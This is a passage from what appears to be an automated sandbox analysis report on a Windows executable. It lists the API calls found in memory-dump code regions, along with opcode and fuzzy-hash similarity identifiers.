                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1814673581-0
                                                                                                                                                                            • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                            • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                                                            • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                            • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                            • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                            • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                                                            • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                            • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                                                            • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                                                            • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 372113273-0
                                                                                                                                                                            • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                            • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                                                            • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                            • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                            • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                            • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                                                                            • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                            • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                            • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                            • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                            • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                            • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                            • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                            • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\LlbpXphTu9.exe,00000004), ref: 00436055
                                                                                                                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00436081
                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1690418490-0
                                                                                                                                                                            • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                            • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                                                                            • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                            • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                            • String ID: .lnk$HH
                                                                                                                                                                            • API String ID: 886957087-3121654589
                                                                                                                                                                            • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                                                            • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                                                            • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                                                                            • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                            • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                                                                            • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                            • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 763830540-1403004172
                                                                                                                                                                            • Opcode ID: 7f2c4204b424c93c7ac22b89fbd31dfb367e10b18f94ca1fc21d6a87b04bc3c1
                                                                                                                                                                            • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f2c4204b424c93c7ac22b89fbd31dfb367e10b18f94ca1fc21d6a87b04bc3c1
                                                                                                                                                                            • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                            • String ID: nul
                                                                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                                                                            • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                            • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                            • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                            • String ID: nul
                                                                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                                                                            • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                            • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                                                            • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
